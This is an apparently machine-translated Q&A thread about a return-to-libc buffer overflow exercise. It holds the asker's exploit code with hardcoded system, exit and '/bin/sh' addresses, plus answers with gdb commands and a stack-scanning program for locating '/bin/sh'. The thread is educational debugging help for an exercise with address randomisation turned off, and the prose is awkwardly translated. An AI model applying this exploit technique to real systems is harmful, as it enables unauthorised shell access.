zurück zu lib_c buffer-overflow-übung Thema

Ich soll kommen mit einem Programm, nutzt die "return to libc-Puffer-überlauf". Dies ist, wenn Sie ausgeführt, es sauber beendet und bringt eine SHELL-Eingabeaufforderung. Das Programm wird ausgeführt in einem bash-terminal. Unten ist mein C-code:

#include <stdio.h>
int main(int argc, char*argv[]){
    char buffer[7];

    char buf[42];
    int i = 0;
    while(i < 28)
    {
            buf[i] = 'a';
            i = i + 1;
    }

    *(int *)&buf[28] = 0x4c4ab0;
    *(int *)&buf[32] = 0x4ba520;
    *(int *)&buf[36] = 0xbfffff13;

    strcpy(buffer, buf);

    return 0;
}

Mit gdb, ich habe in der Lage, um zu bestimmen, die folgenden:

  • - Adresse für "system": 0x4c4ab0
  • - Adresse für "exit": 0x4ba520
  • Den string "/bin/sh" befindet sich im Speicher an: 0xbfffff13

Weiß ich auch, mit gdb, dass das einfügen von 32 "A"'s in meinen buffer-variable überschreiben der Rücksprungadresse. So da der system call is 4 bytes, beginne ich durch die Füllung in my memory "Leck" am 28 bytes. Am 28 byte, beginne ich mein system aufrufen, dann beenden call, und schließlich noch meine "/bin/sh" Speicherort.

Wenn ich das Programm ausführen, jedoch bekomme ich die folgende:

sh: B���: command not found
Segmentation fault (core dumped)

Ich bin wirklich nicht sicher, was ich falsch mache...

[EDIT]: ich war in der Lage, die Zeichenkette "/bin/sh" durch exportieren von Umgebungsvariablen:

export MYSHELL="/bin/sh"
  • Ist dein string "/bin/sh" beendet mit einem \0?
  • Zu sehen, wie ich verwendet, "export", um es in den Speicher - es ist durchaus möglich, es ist beendet mit dem \0-Zeichen.
  • die Adresse von /bin/sh Veränderungen vor und nach gdb. Finden, ein vorkommen von /bin/sh direkt in der libc verwendet.
  • Die Adresse bekam ich für /bin/sh durch mit meinem Programm durch die gdb, also die Adresse, die ich sah, sollte das gleiche wie wenn ich das Programm von selbst. Es gibt keine Adresse Randomisierung auf dieser Maschine, entweder.
  • auch ohne stack-randomization, die Form der stack ist nicht das gleiche unter oder nicht unter gdb. Die stack-Adresse Ihres MYSHELL variable ist wahrscheinlich anders zu sein, nicht unter gdb als die, die Sie haben unter gdb.
InformationsquelleAutor lightningmanic | 2013-10-01
  1. 46

    Suchen können Sie in der libc für eine Feste Adresse eines string /bin/sh. Führen Sie das Programm in gdb dann:

    > (gdb) break main
> 
> (gdb) run   
>
> (gdb) print &system  
> $1 = (<text variable, no debug info>*) 0xf7e68250 <system>
> 
> (gdb) find &system,+9999999,"/bin/sh"  
> 0xf7f86c4c
> warning: Unable to access target memory at 0xf7fd0fd4, halting search. 
> 1 pattern found.

    Glück.

    • Kurze Anmerkung, abhängig von Ihrer Architektur, müssen Sie möglicherweise einige dummy-Daten zwischen Ihrem system () - Aufruf, und Ihr "/bin/sh" Ausführung
    InformationsquelleAutor Lucifer
  2. 4

    Das problem in Ihrem Programm ist der Zeiger, der angenommen, auf die /bin/sh string ist eigentlich nicht auf den /bin/sh.

    Bekommen Sie diese Adresse mit gdb. Aber auch ohne stack-randomization, stack-Adresse Ihres shell-variable ist anders, wenn das Programm ausgeführt wird, unter gdb als ohne gdb. gdb setzt einige debug-Informationen in dem stack, und diese Schicht wird Ihre shell-Variablen.

    Überzeugen Sie sich selbst hier ist eine quick-and-dirty-Programm zu finden /bin/sh string in den stack:

    #include <stdio.h>
#include <string.h>

int main(void)
{
    char s[] = "/bin/sh";
    char *p = (char *) 0xbffff000;

    while (memcmp(++p, s, sizeof s));

    printf("%s\n", p);
    printf("%p\n", p);
}

    Zuerst überprüfen Sie, dass stack-randomization ist deaktiviert:

    ouah@maou:~$ sysctl kernel.randomize_va_space
kernel.randomize_va_space = 0
ouah@maou:~$

    Ok, kein stack-randomization.

    Let ' s kompilieren Sie das Programm und führen Sie es außerhalb gdb:

    ouah@maou:~$ gcc -std=c99 tst.c
ouah@maou:~$ ./a.out
/bin/sh
0xbffff724
ouah@maou:~$

    Lassen Sie uns nun führen Sie es unter gdb:

    ouah@maou:~$ ./a.out
/bin/sh
0xbffff724
ouah@maou:~$ gdb a.out -q
Reading symbols from /home/ouah/a.out...(no debugging symbols found)...done.
(gdb) r
Starting program: /home/ouah/a.out
/bin/sh
0xbffff6e4

Program exited normally.
(gdb) quit
ouah@maou:~$

    Wie sehen Sie die Adresse der /bin/sh string ist anders, wenn das Programm ausgeführt wird, innerhalb oder außerhalb gdb.

    Nun, was Sie tun können, ist zu verwenden eine Variante dieses Programms zu finden, die wahre Adresse des Strings oder ein eleganter Ansatz, die Adresse einer /bin/sh string direkt aus der libc (wie Sie sich vorstellen können gibt es ein paar vorkommen).

    • Während Sie das Beispiel ausführen erhalte ich einen segmentation fault... warum ?
    • nicht diese einfach ausdrucken-Adresse der Zeichenfolge, die Sie definiert in main?
    InformationsquelleAutor ouah
Schreibe einen Kommentar